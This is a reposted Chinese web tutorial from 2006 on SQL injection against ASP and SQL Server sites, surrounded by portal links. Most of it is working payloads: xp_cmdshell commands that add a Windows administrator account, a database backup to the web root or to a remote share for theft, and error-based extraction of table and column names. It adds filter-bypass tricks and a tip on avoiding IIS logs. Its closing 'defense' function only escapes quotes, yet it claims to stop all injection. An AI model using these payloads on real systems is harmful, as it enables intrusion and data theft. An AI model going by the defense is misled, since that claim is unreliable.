河北人才网 河北家教网 河北大学生村官网 河北创业网 河北考试网 河北大学生网
  河北大学生网 >> 电脑学院 >> 服务器技术 >> SQL Server >> 正文
大学生创业

网络SQL入侵与防范高级篇

http://www.hbdxs.com  更新时间:2006-8-18 13:33:06  来源:网络收集  点击:


关键字:服务器技术

  第一节、利用系统表注入SQLServer数据库
  
  SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:
  
  ① http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--
  
  分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:
  
  ② http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
  
  将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。
  
  ③ http://Site/url.asp?id=1 ;;;and db_name()>0
  
  前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。
  
  ④ http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;--
  
  这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如\\202.96.xx.xx\Share\1.db),但成功率不高。
  
  ⑤ http://Site/url.asp?id=1 ;;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
  
  前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。
  
  ⑥ http://Site/url.asp?id=1 ;;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0
  
  从⑤拿到表名后,用object_id(‘表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。
  
  以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧。
  
  第二节、绕过程序限制继续注入
  
  在入门篇提到,有很多人喜欢用’号测试注入漏洞,所以也有很多人用过滤’号的方法来“防止”注入漏洞,这也许能挡住一些入门者的攻击,但对SQL注入比较熟悉的人,还是可以利用相关的函数,达到绕过程序限制的目的。
  
  在“SQL注入的一般步骤”一节中,我所用的语句,都是经过我优化,让其不包含有单引号的;在“利用系统表注入SQLServer数据库”中,有些语句包含有’号,我们举个例子来看看怎么改造这些语句:
  
  简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。
  
  第三节、经验小结
  
  1.有些人会过滤Select、Update、Delete这些关键字,但偏偏忘记区分大小写,所以大家可以用selecT这样尝试一下。
  
  2.在猜不到字段名时,不妨看看网站上的登录表单,一般为了方便起见,字段名都与表单的输入框取相同的名字。
  
  3.特别注意:地址栏的+号传入程序后解释为空格,%2B解释为+号,%25解释为%号,具体可以参考URLEncode的相关介绍。
  
  4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。
  
  5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高。
  
  第四节、防范方法
  
  SQL注入漏洞可谓是“千里之堤,溃于蚁穴”,这种漏洞在网上极为普遍,通常是由于程序员对注入不了解,或者程序过滤不严格,或者某个参数忘记检查导致。在这里,我给大家一个函数,代替ASP中的Request函数,可以对一切的SQL注入Say NO,函数如下:
  
  Function SafeRequest(ParaName,ParaType)
  '--- 传入参数 ---
  'ParaName:参数名称-字符型
  'ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)
  
  Dim ParaValue
  ParaValue=Request(ParaName)
  If ParaType=1 then
  If not isNumeric(ParaValue) then
  Response.write "参数" & ParaName & "必须为数字型!"
  Response.end
  End if
  Else
  ParaValue=replace(ParaValue,"'","''")
  End if
  SafeRequest=ParaValue
  End function
服务器应用:用typsoft ftp建FTP站点2(图)
SOHO族安全建议之保证上传服务器安全一
SOHO族安全建议之保证上传服务器安全二
怎样配置具有SSL保护的FTP服务器

更多信息请访问: FTP服务器   Exchange   ISA Server   域服务器   Web服务器   SQL Server   其他

特别说明:由于各方面情况的不断调整与变化,河北大学生网所提供的所有信息仅供参考,敬请网友以权威部门公布的正式信息为准。

  精彩推荐           [大学生活] [男生女生] [大学生心理] [青春隐私] [性教育]

女大学生竟在大白天攀爬进入男生宿舍

女大学生卖淫竟有菜单(组图)

简约的个人简历封面

2010年最新大学生简历封面

好身手!女大学生爬楼进入男寝室[图]

大学生热议《蜗居》:这是最真实的生活

2010年最新简历封面——青春活力

放心走吧,谷歌中国。

   广告赞助商
   最新推荐

关于本站 | SITEMAP | 网站地图 | 友情链接 | 联系方式 | 广告服务 | 论文发表 | 投稿 |
本站所刊资料部分为网上收集,如果确实侵犯了您的版权,请通知我们。
版权所有:河北大学生网 冀ICP备06003390 PR=5
大海 活埋 棉花糖 音乐盒 下雨天 手机之家 寂寞暴走 非主流音乐 寂寞才说爱 感动天感到地 最后一次的温柔 伤心的时候可以听情歌 下辈子不做女人 听着情歌流眼泪
愚爱 郑源 校园网 我和你 不值得 你的承诺 最后一次 我们的无奈 会呼吸的痛 丢了幸福的猪 怎么会狠心伤害我 得到你的人却得不到你的心 爱上你等于爱上了错 葬爱
白狐 欢子 摇啊摇 换换爱 坏女人 凤舞九天 流行歌曲 关不上的窗 永远在身边 说好的幸福呢 爱上你是我的错 当我孤独的时候还可以抱着你 笔记本 单身情歌 新不了情
红日 火花 有缘人 女人花 青花瓷 音乐网站 电子杂志 天使的翅膀 一定要爱你 飞向别人的床 我爱你你却爱着他 做我老婆好不好 左眼皮跳跳 歌曲 城府 如何能把你忘记
承诺 犯错 QQ音乐 我知道 小乌龟 擦肩而过 周公解梦 爱在离别时 中国人才网 心在跳情在烧 爱上你是一个错 不是因为寂寞才想你 MP3 音乐在线 婚礼歌曲 韩国歌曲